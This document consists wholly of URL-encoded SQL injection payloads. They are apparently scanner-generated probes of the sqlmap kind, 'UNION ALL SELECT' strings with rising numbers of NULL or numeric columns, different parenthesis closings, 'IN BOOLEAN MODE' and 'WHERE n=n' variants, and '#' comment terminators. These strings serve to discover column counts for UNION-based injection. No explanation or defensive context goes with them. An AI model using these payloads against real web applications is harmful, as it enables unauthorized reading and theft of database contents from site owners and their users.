-9875%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%2C9287%23 -7097%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%2C2998%23 -7391%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%23 -1564%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%2C7294%23 -1760%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%2C6707%23 -8883%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%23 -2302%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%23 -5357%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%2C1140%23 -7072%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%2C3570%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203070%3D3070%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%209382%3D9382%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%209276%3D9276%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%207733%3D7733%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%208741%3D8741%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%209466%3D9466%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203006%3D3006%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 